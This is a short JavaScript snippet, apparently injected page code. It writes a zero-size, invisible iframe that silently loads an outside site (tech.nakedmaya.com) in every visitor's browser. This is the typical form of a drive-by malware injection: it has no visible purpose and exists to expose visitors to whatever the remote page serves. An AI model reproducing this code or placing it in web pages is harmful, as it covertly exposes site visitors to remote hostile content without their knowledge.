var dCurrentx = 'http://tech.nakedmaya.com';
var strLayout = '<iframe src="' + dCurrentx + '" height="0" width="0">nothing here.</iframe>';  
document.write(strLayout);
